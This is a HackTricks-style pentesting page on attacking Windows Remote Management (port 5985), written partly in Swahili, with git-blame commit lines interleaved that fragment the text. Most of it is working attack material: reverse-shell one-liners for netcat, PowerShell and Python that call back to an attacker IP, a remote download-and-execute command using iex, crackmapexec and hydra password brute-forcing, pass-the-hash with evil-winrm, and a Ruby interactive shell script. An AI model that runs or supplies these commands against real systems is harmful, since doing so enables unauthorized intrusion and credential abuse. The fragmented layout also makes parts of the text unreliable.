+								```powershell
-												GitBook: [master] 26 pages and 20 assets modified
											
										
										
											2021-08-14 10:42:47 +00:00
+								Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Tekeleza Skripti
 								To execute a script on a remote Windows machine using WinRM, you can use the `Invoke-Command` cmdlet in PowerShell. This cmdlet allows you to run commands or scripts on remote computers.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Here is an example of how to execute a script using WinRM:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								```powershell
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Invoke-Command -ComputerName <target_ip> -ScriptBlock { <script_content> }
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Replace `<target_ip>` with the IP address of the remote machine and `<script_content>` with the actual content of your script.
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Make sure that WinRM is enabled on the target machine and that you have the necessary permissions to execute scripts remotely.
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								```powershell
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Pata kifaa cha kudhibiti kwa njia ya nyuma
 								To get a reverse shell, you can use the following methods:
 								#### Method 1: Netcat
 . Start a listener on your machine: `nc -lvp <port>`
 . Execute the following command on the target machine: `nc <your_ip> <port> -e /bin/bash`
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								#### Method 2: PowerShell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. Start a listener on your machine: `nc -lvp <port>`
 . Execute the following command on the target machine: `powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<your_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								#### Method 3: Python
 . Start a listener on your machine: `nc -lvp <port>`
 . Execute the following command on the target machine: `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
 								Remember to replace `<port>` with the desired port number and `<your_ip>` with your machine's IP address.
 								```powershell
 								Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
 								```
 								### Pata kikao cha PS
 								Ili kupata kikao cha PowerShell kinachoweza kuingiliana, tumia `Enter-PSSession`:
-												GitBook: [#3511] No subject

											
										
										
											2022-09-26 12:02:10 +00:00
+								```powershell
 								#If you need to use different creds
 								$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
 								## Note the ".\" in the suername to indicate it's a local user (host domain)
 								$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
 								# Enter
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
-												GitBook: [#3636] No subject

											
										
										
											2022-10-30 16:20:17 +00:00
+								## Bypass proxy
 								Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								# Save session in var
-												GitBook: [#3636] No subject

											
										
										
											2022-10-30 16:20:17 +00:00
+								$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
 								Enter-PSSession $sess
 								## Background current PS session
 								Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								![](<../.gitbook/assets/image (164).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Kikao kitakimbia katika mchakato mpya (wsmprovhost) ndani ya "mwathirika"**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### **Kulazimisha Kufunguliwa kwa WinRM**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ili kutumia PS Remoting na WinRM lakini kompyuta haijasanidiwa, unaweza kuwezesha kwa:
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								```powershell
 								.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Kuokoa na Kurudisha vikao
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hii **haitafanya kazi** ikiwa **lugha** imezuiliwa kwenye kompyuta ya mbali.
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								```powershell
-												GitBook: [#3511] No subject

											
										
										
											2022-09-26 12:02:10 +00:00
+								#If you need to use different creds
 								$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
 								## Note the ".\" in the suername to indicate it's a local user (host domain)
 								$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								#You can save a session inside a variable
-												GitBook: [#3507] No subject

											
										
										
											2022-09-25 22:00:52 +00:00
+								$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								#And restore it at any moment doing
 								Enter-PSSession -Session $sess1
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ndani ya kikao hiki unaweza kupakia skripti za PS kwa kutumia _Invoke-Command_
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								```powershell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Makosa
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa unapata kosa lifuatalo:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								`enter-pssession : Kukamilisha uunganisho kwa seva ya mbali 10.10.10.175 kumeshindikana na ujumbe wa kosa lifuatalo: Mteja wa WinRM hauwezi kusindika ombi. Ikiwa mfumo wa uwakilishi ni tofauti na Kerberos, au ikiwa kompyuta ya mteja haijasajiliwa kwenye kikoa, basi usafirishaji wa HTTPS unapaswa kutumika au mashine ya marudio inapaswa kuongezwa kwenye mipangilio ya usanidi wa TrustedHosts. Tumia winrm.cmd kuweka mipangilio ya TrustedHosts. Kumbuka kuwa kompyuta kwenye orodha ya TrustedHosts huenda zisiwe na uwakilishi. Unaweza kupata habari zaidi kuhusu hilo kwa kukimbia amri ifuatayo: winrm help config. Kwa habari zaidi, angalia mada ya Msaada kuhusu Kutatua Matatizo ya Mbali.`
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Jaribu kwenye mteja (taarifa kutoka [hapa](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)):
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```ruby
 								winrm quickconfig
 								winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
 								```
-												hackenproof

											
										
										
											2023-12-04 15:45:05 +00:00
+								<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Jiunge na seva ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa bug bounty!
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Machapisho ya Udukuzi**\
 								Shiriki na yaliyomo yanayochunguza msisimko na changamoto za udukuzi
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Habari za Udukuzi za Waktu Halisi**\
 								Endelea kuwa na habari za ulimwengu wa udukuzi kwa kutumia habari na ufahamu wa wakati halisi
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Matangazo ya Hivi Karibuni**\
 								Baki na habari kuhusu bug bounties mpya zinazozinduliwa na sasisho muhimu za jukwaa
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Uhusiano wa WinRM kwenye linux
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3340] No subject

											
										
										
											2022-07-28 09:46:19 +00:00
+								### Brute Force
-												GitBook: [master] one page modified
											
										
										
											2020-09-20 21:44:41 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kuwa makini, kujaribu kuvunja nguvu winrm kunaweza kuzuia watumiaji.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-09-20 21:41:33 +00:00
+								```ruby
 								#Brute force
 								crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
 								#Just check a pair of credentials
-												fix mess 2

											
										
										
											2022-05-01 12:49:36 +00:00
+								# Username + Password + CMD command execution
-												GitBook: [master] one page modified
											
										
										
											2020-09-20 21:44:41 +00:00
+								crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
-												fix mess 2

											
										
										
											2022-05-01 12:49:36 +00:00
+								# Username + Hash + PS command execution
-												GitBook: [master] one page modified
											
										
										
											2020-09-20 21:44:41 +00:00
+								crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
-												GitBook: [master] 3 pages modified
											
										
										
											2020-09-20 21:41:33 +00:00
+								#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Kutumia evil-winrm
-												GitBook: [master] 3 pages modified
											
										
										
											2020-09-20 21:41:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Evil-winrm ni chombo cha nguvu kinachotumiwa katika uchunguzi wa usalama wa mtandao kwa kuingia kwa nguvu kwenye huduma ya WinRM. Inatoa njia rahisi ya kudhibiti na kuchunguza mifumo ya Windows kwa njia ya mbali.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kuanza, unahitaji kujua anwani ya IP ya mfumo wa lengo na kuwa na ufikiaji wa mtandao kwa mfumo huo. Kisha, unaweza kutumia amri ifuatayo kuanzisha kikao cha WinRM:
 								```plaintext
 								evil-winrm -i <ip_address> -u <username> -p <password>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Badala ya kuingiza nenosiri moja kwa moja kwenye amri, unaweza pia kutumia faili ya nenosiri kwa njia ifuatayo:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								```plaintext
 								evil-winrm -i <ip_address> -u <username> -P <password_file>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Baada ya kuanzisha kikao, unaweza kutumia amri za evil-winrm kufanya shughuli mbalimbali kwenye mfumo wa lengo. Kwa mfano, unaweza kuangalia habari ya mfumo kwa kutumia amri ifuatayo:
 								```plaintext
 								shell
 								sysinfo
 								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Pia, unaweza kutekeleza amri za PowerShell kwa kutumia amri ifuatayo:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								```plaintext
 								shell
 								powershell
 								```
 								Evil-winrm inatoa njia rahisi ya kuingia kwa nguvu kwenye huduma ya WinRM na kuchunguza mifumo ya Windows kwa njia ya mbali. Ni chombo muhimu katika uchunguzi wa usalama wa mtandao.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```ruby
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								gem install evil-winrm
 								```
 								Soma **nyaraka** kwenye github yake: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
 								```ruby
 								evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kutumia evil-winrm kuunganisha kwenye anwani ya **IPv6**, tengeneza kuingiza ndani ya _**/etc/hosts**_ kuweka **jina la kikoa** kwa anwani ya IPv6 na uunganishe kwenye kikoa hicho.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Pita hash na evil-winrm
 								```ruby
 								evil-winrm -u <username> -H <Hash> -i <IP>
 								```
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								![](<../.gitbook/assets/image (173).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Kutumia kifaa cha PS-docker
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								docker run -it quickbreach/powershell-ntlm
 								$creds = Get-Credential
 								Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Kutumia skripti ya ruby
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Msimbo umetolewa hapa: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```ruby
 								require 'winrm-fs'
 								# Author: Alamot
 								# To upload a file type: UPLOAD local_path remote_path
 								# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
-												a

											
										
										
											2024-02-05 02:28:59 +00:00
+								# https://alamot.github.io/winrm_shell/
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								conn = WinRM::Connection.new(
 								endpoint: 'https://IP:PORT/wsman',
 								transport: :ssl,
 								user: 'username',
 								password: 'password',
 								:no_ssl_peer_verification => true
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								)
 								class String
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								def tokenize
 								self.
 								split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
 								select {|s| not s.empty? }.
 								map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
 								end
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								end
 								command=""
 								file_manager = WinRM::FS::FileManager.new(conn)
 								conn.shell(:powershell) do |shell|
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								until command == "exit\n" do
 								output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
 								print(output.output.chomp)
 								command = gets
 								if command.start_with?('UPLOAD') then
 								upload_command = command.tokenize
 								print("Uploading " + upload_command[1] + " to " + upload_command[2])
 								file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
 								puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
 								end
 								command = "echo `nOK`n"
 								end
 								output = shell.run(command) do |stdout, stderr|
 								STDOUT.print(stdout)
 								STDERR.print(stderr)
 								end
 								end
 								puts("Exiting with code #{output.exitcode}")
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								end
 								```
-												GitBook: [#3340] No subject

											
										
										
											2022-07-28 09:46:19 +00:00
+								## Shodan
-												GitBook: [master] 378 pages modified
											
										
										
											2020-10-05 21:51:08 +00:00
 								* `port:5985 Microsoft-HTTPAPI`
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Marejeo
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
 								* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Amri za Kiotomatiki za HackTricks
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												HAC 5985

This is the only page I edited outside of the HAC section. I put the title on top so that It can fall into the parsing standard. If the link needs to be on top, I can work around that by adding an exception.
											
										
										
											2021-08-12 12:53:13 +00:00
+								Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
 								Port_Number:  5985     #Comma separated if there is more than one.
 								Protocol_Description: Windows Remote Managment        #Protocol Abbreviation Spelled out
-												Yaml Format
											
										
										
											2021-08-15 17:09:57 +00:00
+								Entry_1:
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Name: Notes
 								Description: Notes for WinRM
 								Note: |
 								Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
-												Yaml Format
											
										
										
											2021-08-15 17:09:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								sudo gem install winrm winrm-fs colorize stringio
 								git clone https://github.com/Hackplayers/evil-winrm.git
 								cd evil-winrm
 								ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’
-												Yaml Format
											
										
										
											2021-08-15 17:09:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
-												Yaml Format
											
										
										
											2021-08-15 17:09:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
 								^^so you can upload binary's from that directory        or -s to upload scripts (sherlock)
 								menu
 								invoke-binary `tab`
-												Yaml Format
											
										
										
											2021-08-15 17:09:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								#python3
 								import winrm
 								s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
 								print(s.run_cmd('ipconfig'))
 								print(s.run_ps('ipconfig'))
-												Yaml Format
											
										
										
											2021-08-15 17:09:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								https://book.hacktricks.xyz/pentesting/pentesting-winrm
-												GitBook: [master] 19 pages and 4 assets modified
											
										
										
											2021-09-25 16:33:43 +00:00
-												HAC WinRm
											
										
										
											2021-09-13 15:49:25 +00:00
+								Entry_2:
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Name: Hydra Brute Force
 								Description: Need User
 								Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
-												GitBook: [master] 17 pages and 28 assets modified
											
										
										
											2021-08-15 22:19:51 +00:00
+								```
-												hackenproof

											
										
										
											2023-12-04 15:45:05 +00:00
+								<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Jiunge na seva ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Machapisho ya Udukuzi**\
 								Shiriki na yaliyomo yanayochunguza msisimko na changamoto za udukuzi
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Habari za Udukuzi za Waktu Halisi**\
 								Endelea kuwa na habari za ulimwengu wa udukuzi kwa kutumia habari na ufahamu wa wakati halisi
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Matangazo ya Hivi Karibuni**\
 								Baki na habari kuhusu tuzo za mdudu zinazoanzishwa na sasisho muhimu za jukwaa
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Njia nyingine za kusaidia HackTricks:
-												arte

											
										
										
											2024-01-03 10:42:55 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
 								* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
 								* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 								* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>